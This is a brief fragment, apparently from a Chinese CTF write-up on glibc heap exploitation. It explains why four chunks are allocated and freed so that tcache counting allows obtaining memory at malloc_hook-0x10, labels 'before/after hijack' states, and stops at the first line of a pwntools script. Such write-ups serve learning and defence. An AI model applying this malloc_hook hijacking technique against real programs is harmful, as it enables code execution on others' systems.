赞
踩
劫持前:
劫持后:
注:申请四个chunk,且释放四个chunk的原因是,tcache机制会记录进入tcache的个数,若只释放了三个,我们无法申请出malloc_hook-0x10
from pwn import * context.update(os='linux',arch='amd64',log_level='debug'